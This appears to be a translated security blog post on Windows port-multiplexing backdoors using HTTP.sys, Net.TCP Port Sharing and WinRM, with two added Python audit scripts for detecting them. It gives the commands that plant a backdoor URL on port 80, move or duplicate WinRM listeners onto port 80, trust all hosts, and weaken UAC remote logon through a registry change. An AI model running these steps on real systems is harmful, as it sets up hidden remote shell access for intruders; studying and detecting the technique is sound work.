Supplementary notes: port multiplexing
0x01 About port multiplexing
Port multiplexing is a very old backdoor technique. It works mainly by hijacking the memory space of web-server-related processes or services, hooking system APIs, or even hijacking a network driver to reach its goal.
In the Winsock implementation, several servers can bind to the same port. When deciding which of the multiple bindings receives a packet, the rule is that the most specifically bound socket gets the packet, and no privilege check is involved. This kind of multiple binding is called port multiplexing (port reuse).
Below is a summary of port multiplexing backdoors built on the HTTP.sys driver that Windows web services share.
0x02 Net.TCP Port Sharing
Reference: https://docs.microsoft.com/zh-cn/dotnet/framework/wcf/feature-details/configuring-the-net-tcp-port-sharing-service
https://docs.microsoft.com/zh-cn/dotnet/framework/wcf/feature-details/net-tcp-port-sharing
In brief: when TCP/IP was introduced, it assigned each application that uses the protocol a unique 16-bit port number, and port numbers are what distinguish one application from another.
Deploying applications on non-standard ports is often complicated, or even impossible, because of corporate and personal firewalls.
With the Net.TCP Port Sharing service provided by Microsoft, any application that follows the service's development rules can share the same web server port with other applications.
In the HTTP.SYS model, many different HTTP applications are multiplexed onto a single TCP port. This model has become the standard on the Windows platform. It gives firewall administrators a common point of control, while letting application developers make full use of the network and lowering the cost of deploying a new generation of applications.
The ability to share ports between multiple HTTP applications has long been a feature of Internet Information Services (IIS). However, it was only with the introduction of HTTP.SYS (the kernel-mode HTTP protocol listener) in IIS 6.0 that this infrastructure became fully and widely usable.
(1) When IIS, or any other application that uses the HTTP Server API, listens for requests on a path, it must register a URL prefix with HTTP.SYS. The rules for URL registration are documented on MSDN: https://msdn.microsoft.com/en-us/library/windows/desktop/aa364698(v=vs.85).aspx. This is the registration step.
(2) When a request arrives and is received by http.sys, it must be dispatched to the application that registered the matching URL. This is the routing step.
So the idea of port multiplexing here is simple: different applications register different URL prefixes through the HTTP Server API, and http.sys dispatches the requests for each URL to the corresponding application, which achieves the effect of "different applications sharing one port".
0x03 http.sys && WinRM
HTTP.sys driver
The HTTP.sys driver is the core component of IIS.
Use the command
netsh http show servicestate
to view all URL prefixes registered in HTTP.sys.
In fact, WinRM registers the URL prefix wsman in HTTP.sys and listens on port 5985 by default. This can be seen in the WinRM architecture diagram published by Microsoft.
0x04 Port multiplexing forward backdoor
Condition:
The target natively supports web applications developed on Net.tcp Port Sharing.
First, a UrlPrefix must be registered in the correct format.
UrlPrefix format
A UrlPrefix has the following syntax:
"scheme://host:port/relativeURI"
Examples:
"http://www.cnblogs.com:80/-qing-/"
"https://www.cnblogs.com:443/-qing-/"
"https://+:80/<virtual root>/" (a leading "+" is the wildcard host)
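As an added example (not code from the original post), the following Python parses UrlPrefix strings of the form above and runs a defender-side audit over the output of `netsh http show servicestate` mentioned earlier: it extracts every prefix listed under "Registered URLs:", groups them by TCP port, and reports prefixes that share a port with the web root but are not on a baseline. The snapshot text is a constructed, abbreviated imitation of the netsh output, and the baseline (IIS on port 80 plus the default WinRM reservations) is an assumption for illustration; on a real host the baseline is whatever the administrator has documented as legitimate.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# Constructed, abbreviated sample of `netsh http show servicestate` output
# (not captured from a real host). Real output has many more properties; the
# lines an audit cares about are the ones under "Registered URLs:".
SAMPLE_SERVICESTATE = """\
Snapshot of HTTP service state (Server Session View):
-----------------------------------------------------

Server session ID: FF00000020000001
    Version: 2.0
    State: Active
    URL groups:
    URL group ID: FE00000040000001
        State: Active
        Request queue name: Request queue is unnamed.
        Properties:
            Number of registered URLs: 2
            Registered URLs:
                HTTP://+:5985/WSMAN/
                HTTP://+:47001/WSMAN/

Server session ID: FF00000020000002
    Version: 2.0
    State: Active
    URL groups:
    URL group ID: FE00000040000002
        State: Active
        Request queue name: Request queue is unnamed.
        Properties:
            Number of registered URLs: 2
            Registered URLs:
                HTTP://*:80/
                HTTP://+:80/QING_DOOR/
"""

# Assumed baseline: prefixes an administrator expects on a plain IIS host that
# also runs WinRM with its default reservations. Keys are ports, values are
# canonical (lower-cased) prefixes.
IIS_BASELINE: Dict[int, Set[str]] = {
    80: {"http://*:80/"},
    5985: {"http://+:5985/wsman/"},
    47001: {"http://+:47001/wsman/"},
}

# scheme://host:port/relativeURI  (IPv6 literals in brackets are not handled here)
_PREFIX_RE = re.compile(
    r"^(?P<scheme>https?)://(?P<host>[^/:]+):(?P<port>\d{1,5})(?P<path>/.*)$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class UrlPrefix:
    scheme: str
    host: str          # hostname, "+" (strong wildcard) or "*" (weak wildcard)
    port: int
    relative_uri: str

    def canonical(self) -> str:
        return f"{self.scheme}://{self.host}:{self.port}{self.relative_uri}"


def parse_url_prefix(text: str) -> UrlPrefix:
    """Split a UrlPrefix string into its four components, validating port and path."""
    m = _PREFIX_RE.match(text.strip())
    if not m:
        raise ValueError(f"not a valid UrlPrefix: {text!r}")
    port = int(m.group("port"))
    if not 0 < port < 65536:
        raise ValueError(f"port out of range in {text!r}")
    path = m.group("path")
    if not path.endswith("/"):
        raise ValueError(f"relativeURI must end with '/': {text!r}")
    return UrlPrefix(m.group("scheme").lower(), m.group("host").lower(), port, path.lower())


def registered_urls(servicestate: str) -> List[str]:
    """Collect the prefixes listed under every 'Registered URLs:' heading."""
    urls: List[str] = []
    in_block = False
    for raw in servicestate.splitlines():
        line = raw.strip()
        if line == "Registered URLs:":
            in_block = True
            continue
        if in_block:
            if _PREFIX_RE.match(line):
                urls.append(line)
            else:
                in_block = False   # first non-prefix line ends the list
    return urls


def audit_port_sharing(servicestate: str, baseline: Dict[int, Set[str]]) -> Dict[int, List[UrlPrefix]]:
    """Return, per port, the registered prefixes that are not on the baseline for that port."""
    findings: Dict[int, List[UrlPrefix]] = {}
    for text in registered_urls(servicestate):
        prefix = parse_url_prefix(text)
        if prefix.canonical() not in baseline.get(prefix.port, set()):
            findings.setdefault(prefix.port, []).append(prefix)
    return findings


if __name__ == "__main__":
    for port, prefixes in audit_port_sharing(SAMPLE_SERVICESTATE, IIS_BASELINE).items():
        for p in prefixes:
            print(f"port {port}: unexpected prefix {p.canonical()}")
```

On the sample snapshot the audit reports only `http://+:80/qing_door/`: the IIS root and both default WinRM reservations are on the baseline, while the extra prefix sharing port 80 is not. Because the prefix is registered in HTTP.sys rather than bound by a second socket, `netstat` shows nothing new on port 80, which is why the check has to read the HTTP.sys state rather than the socket table.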
Registering the forward backdoor URL
C:\Documents and Settings\Administrator>"C:\Documents and Settings\Administrator\桌面\door\door.exe" http://192.168.5.35:80/qing_door/qing.html
Connected to the specified address
There is also a common pseudo port multiplexing scenario:
Winsock by default does not allow the same address and port to be bound more than once, but the same port can still be bound on different addresses, such as 0.0.0.0, 192.168.1.*, and the local loopback address.
0x05 WinRM forward backdoor
WinRM service
WinRM stands for Windows Remote Management. It is part of Microsoft's server management functionality and can manage local or remote servers. The WinRM service lets administrators log on to the Windows operating system remotely and obtain a Telnet-like interactive command-line shell, but the underlying communication protocol is HTTP.
Enabling the WinRM service
On Windows Server 2012 and later, the WinRM service is started by default and listens on port 5985.
On Windows 2008, the WinRM service must be started with a command. The quick configuration and startup command is
winrm quickconfig -q
After this command runs it automatically adds a firewall exception rule that opens port 5985.
Adding a port 80 listener
On machines where WinRM is already enabled, the original port 5985 listener must be kept while a listener on port 80 is added, so that administrators can still use port 5985 and we can connect to WinRM on port 80.
Use the following command to add a listener on port 80
winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
On Windows Server 2012 and later, this single command is enough to achieve port multiplexing.
The original port 5985 listener is still retained.
To change the listener port to 80:
winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}
After this configuration WinRM has a listener on port 80, and at the same time the IIS web service keeps working normally.
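As an added example (not code from the original post), the following Python shows the defender-side check for the two changes described in this section: it parses the indented `Name = value` output of `winrm enumerate winrm/config/listener` and `winrm get winrm/config/service`, flags `EnableCompatibilityHttpListener`/`EnableCompatibilityHttpsListener` set to true, and flags any enabled listener whose port differs from the service's own `DefaultPorts`. The two sample texts are constructed, abbreviated imitations of the real command output (they model a host after both commands above were run), not captures from a real machine.

```python
import re
from typing import Dict, List

# Constructed sample of `winrm enumerate winrm/config/listener` output,
# abbreviated; models the listener after its port was changed to 80.
SAMPLE_LISTENERS = """\
Listener
    Address = *
    Transport = HTTP
    Port = 80
    Hostname
    Enabled = true
    URLPrefix = wsman
    CertificateThumbprint
    ListeningOn = 127.0.0.1, 192.168.5.35, ::1
"""

# Constructed sample of `winrm get winrm/config/service` output, abbreviated;
# models the service after EnableCompatibilityHttpListener was set to true.
SAMPLE_SERVICE = """\
Service
    AllowUnencrypted = false
    DefaultPorts
        HTTP = 5985
        HTTPS = 5986
    EnableCompatibilityHttpListener = true
    EnableCompatibilityHttpsListener = false
    AllowRemoteAccess = true
"""

_KV_RE = re.compile(r"^\s*(\w+)\s*=\s*(.*)$")


def parse_winrm_blocks(text: str) -> List[Dict[str, str]]:
    """Turn winrm's indented output into one dict per unindented block ("Listener", "Service").

    Nested sections such as DefaultPorts are flattened into the enclosing block,
    so the default ports appear as keys "HTTP" and "HTTPS"; keys without "="
    (e.g. an empty Hostname) are skipped.
    """
    blocks: List[Dict[str, str]] = []
    for raw in text.splitlines():
        if raw and not raw[0].isspace():
            blocks.append({"_type": raw.strip()})
            continue
        m = _KV_RE.match(raw)
        if m and blocks:
            blocks[-1][m.group(1)] = m.group(2).strip()
    return blocks


def audit_winrm(listeners_text: str, service_text: str) -> List[str]:
    """Return human-readable findings for WinRM reachable on non-default ports."""
    findings: List[str] = []
    service = next(b for b in parse_winrm_blocks(service_text) if b["_type"] == "Service")
    defaults = {"HTTP": service.get("HTTP", "5985"), "HTTPS": service.get("HTTPS", "5986")}

    # The compatibility listeners make WinRM answer on the IIS ports (80/443)
    # through HTTP.sys, without a listener entry of their own.
    if service.get("EnableCompatibilityHttpListener", "false").lower() == "true":
        findings.append("service: EnableCompatibilityHttpListener=true (WinRM also answers on port 80)")
    if service.get("EnableCompatibilityHttpsListener", "false").lower() == "true":
        findings.append("service: EnableCompatibilityHttpsListener=true (WinRM also answers on port 443)")

    for listener in parse_winrm_blocks(listeners_text):
        if listener["_type"] != "Listener":
            continue
        transport = listener.get("Transport", "").upper()
        port = listener.get("Port", "")
        if listener.get("Enabled", "").lower() == "true" and port != defaults.get(transport):
            findings.append(
                f"listener {listener.get('Address')}/{transport}: port {port} "
                f"differs from default {defaults.get(transport)}"
            )
    return findings


if __name__ == "__main__":
    for line in audit_winrm(SAMPLE_LISTENERS, SAMPLE_SERVICE):
        print(line)
```

On the sample texts the audit produces two findings, one for the compatibility listener and one for the HTTP listener moved to port 80; on a host that keeps the defaults it produces none. Reading the defaults from the service's own `DefaultPorts` section rather than hard-coding 5985/5986 keeps the check correct on hosts where the administrator has legitimately changed the defaults.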
Backdoor connection:
To connect to the WinRM service, the local WinRM service must first be started and the trusted hosts must be configured; this is done with the following two commands.
winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}
Connecting
Use the winrs command to connect to the remote WinRM service, execute a command, and return its result
winrs -r:https://www.cnblogs.com/-qing-/ -u:qing -p:xxxxx whoami
You can also connect with cmd to get an interactive shell.
The WinRM service is also subject to UAC, so only the built-in Administrator account of the local Administrators group can log on; other administrator users cannot log on remotely through WinRM. To allow other users in the local Administrators group to log on through WinRM, the registry must be modified.
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
References:
https://docs.microsoft.com/zh-cn/dotnet/framework/wcf/feature-details/configuring-the-net-tcp-port-sharing-service
https://docs.microsoft.com/zh-cn/dotnet/framework/wcf/feature-details/net-tcp-port-sharing
http://mobile.51cto.com/hot-557084.htm
https://www.freebuf.com/articles/web/142628.html
https://www.secrss.com/articles/12696
https://msdn.microsoft.com/en-us/library/windows/desktop/aa364698(v=vs.85).aspx